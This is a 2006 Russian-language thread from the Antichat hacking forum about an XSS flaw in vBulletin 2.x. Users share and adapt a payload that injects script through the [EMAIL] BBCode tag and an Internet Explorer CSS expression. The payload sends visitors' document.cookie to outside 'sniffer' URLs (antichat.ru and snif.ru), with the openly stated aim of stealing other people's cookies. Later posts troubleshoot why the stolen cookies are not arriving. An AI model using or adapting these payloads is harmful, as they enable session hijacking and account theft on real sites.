HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу vBulletin 2.*.* - XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin 2.*.* - XSS
  #1  
Старый 30.11.2006, 02:19
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию vBulletin 2.*.* - XSS
есть код [E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss)); помогите переделать под другой снифер или объясните что тут менять?

Вот под этот
Адрес картинки-сниффера:
http://www.snif.ru/snif/s.gif?id=102

что бы украсть чьи-то cookies, то код должен быть примерно таким:

<script>img=new Image(); img.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;</script>
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.11.2006, 09:57
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию
хм..

Код:
[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;this.sss=null" style=top:expression(eval(this.sss));
 
Ответить с цитированием

  #3  
Старый 30.11.2006, 22:31
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию
в том то и дело что так я уже пробовал и ни че не пришло на снифер но на ачатовский приходит походу дело в снифере может кто скажет в чем может быть разница?
 
Ответить с цитированием

  #4  
Старый 30.11.2006, 22:47
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию
если мне память не изменяет то эта xss уже описывалась давно -- там стоит ограничение на строку с мылом в 60 символов --- поэтому твой скрипт обрезает
 
Ответить с цитированием

  #5  
Старый 30.11.2006, 23:33
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию
форум то скрипт нормально проглатывает, чето я не понял на ачатовский снифак же куки приходят.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS vbulletin and IPB v2.1.7 With IE liauliau Уязвимости CMS / форумов 6 16.08.2006 15:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.